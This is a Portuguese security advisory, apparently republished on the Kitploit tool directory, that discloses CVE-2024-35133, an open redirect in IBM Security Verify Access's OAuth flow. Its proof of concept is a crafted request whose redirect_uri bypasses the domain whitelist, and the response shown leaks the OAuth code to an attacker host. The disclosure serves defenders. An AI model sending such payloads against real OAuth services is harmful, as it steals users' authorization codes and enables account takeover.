Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
IBM-Security-Verify-oAuth_Token_Steal-CVE-2024-35133 — Boletim de Segurança para CVE-2024-35133 - Com PoC | Kitploit
Ferramentas/GitHubGitHub/ozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133

IBM-Security-Verify-oAuth_Token_Steal-CVE-2024-35133

Boletim de Segurança para CVE-2024-35133 - Com PoC

Ver Repositório
23há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

IBM Security Verify Access - Open Redirect durante o Fluxo OAuth (CVE-2024-35133)

Índice

  1. Visão Geral
  2. Descrição Detalhada
  3. Prova de Conceito
  4. Solução
  5. Linha do Tempo da Divulgação
  6. Referências
  7. Créditos
  8. Avisos Legais

Visão Geral

Revisão: 1.0
Impacto:
Ao persuadir uma vítima a visitar um site especialmente criado, um atacante remoto poderia explorar esta vulnerabilidade para falsificar a URL exibida e redirecionar o usuário para um site malicioso. Isso poderia permitir que o atacante obtivesse informações altamente sensíveis ou realizasse ataques adicionais contra a vítima.

Severidade:

  • NIST: Alta
  • IBM: Média

Pontuação CVSS:

  • NIST: 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
  • IBM: 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

CVE-ID: CVE-2024-35133

Fornecedor: IBM

Produtos Afetados:

  • IBM Security Verify Access
  • IBM Security Verify Access Docker

Versões Afetadas: 10.0.0 - 10.0.8

Descrição do Produto

O IBM Security Verify Access é uma solução completa de gerenciamento de políticas de autorização e segurança de rede. Ele fornece proteção de ponta a ponta para recursos em intranets e extranets geograficamente dispersas.

Alguns recursos principais incluem:

  • Autenticação: Ampla gama de autenticadores integrados e suporte para autenticadores externos.
  • Autorização: Decisões seguras de permitir e negar para solicitações de recursos protegidos.
  • Segurança de Dados e Gerenciamento Centralizado de Recursos: Gerencia o acesso seguro a recursos internos baseados em rede usando conectividade pública com a Internet através de um sistema de firewall corporativo.

Descrição Detalhada

Durante um teste de penetração do fluxo OAuth para um cliente, foi descoberta uma vulnerabilidade de Open Redirect, permitindo o vazamento da variável "code" do OAuth.

Ao contornar a lógica do parser responsável por verificar o parâmetro "redirect_uri" durante um fluxo OAuth (utilizando o RFC 3986), o atacante poderia manipular o filtro de whitelist de domínios no IBM Security Verify Access. Isso resultou em um redirecionamento aberto para qualquer domínio arbitrário controlado pelo atacante. A vítima poderia ser redirecionada para um site malicioso enquanto o domínio aparenta ser confiável.

Isso poderia levar à exposição de informações sensíveis, como o token "code" do OAuth, ou a ataques adicionais contra a vítima.


Prova de Conceito

Requisição

GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Resposta

HTTP/1.1 302 Found 
content-language: en-US 
date: Tue, 19 Mar 2024 16:04:35 GMT 
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED] 
p3p: CP="NON CUR OTPi OUR NOR UNI" 
x-frame-options: DENY 
x-content-type-options: nosniff 
cache-control: no-store 
x-xss-protection: 1; mode=block 
x-permitted-cross-domain-policies: none 
cross-origin-resource-policy: same-site 
content-security-policy: frame-ancestors 'none' 
referrer-policy: no-referrer-when-downgrade 
strict-transport-security: max-age=31536000; includeSubDomains 
pragma: no-cache 
Content-Length: 0.

Solução

Consulte o IBM Security Bulletin 7166712 para obter informações sobre patch, atualização ou workaround sugerido.
Consulte Referências para mais detalhes.


Linha do Tempo da Divulgação

  • 19/03/2024: Vulnerabilidade descoberta pelo Pesquisador de Segurança (Giulio Garzia)
  • 21/03/2024: Vulnerabilidade compartilhada com o cliente que utiliza o IBM Security Verify Access
  • 02/04/2024: Vulnerabilidade reportada à IBM
  • 14/05/2024: Vulnerabilidade confirmada pela IBM
  • 18/07/2024: Patch de pré-lançamento fornecido pela IBM ao cliente
  • 27/08/2024: Boletim de Segurança e vulnerabilidade compartilhados pela IBM

Referências

  1. Boletim de Segurança da IBM CVE-2024-35133
  2. Banco de Dados de Vulnerabilidades IBM X-Force
  3. NIST CVE-2024-35133
  4. CWE-178: Tratamento Incorreto de URL

Créditos

Esta vulnerabilidade foi descoberta e reportada por:

  • Giulio Garzia
    LinkedIn
    GitHub

Avisos Legais

Copyright (c) 2024 Giulio Garzia "Ozozuz"

É concedida permissão para redistribuição eletrônica deste alerta. Ele não pode ser editado sem consentimento explícito por escrito. Para obter permissão de reimpressão deste alerta em outros meios, entre em contato com o autor.

Aviso Legal: As informações neste advisory são precisas no momento da publicação com base nos dados disponíveis. Nenhuma garantia é fornecida. Nem o autor nem o editor aceitam responsabilidade por danos diretos, indiretos ou consequenciais decorrentes do uso destas informações.

Baixar ferramenta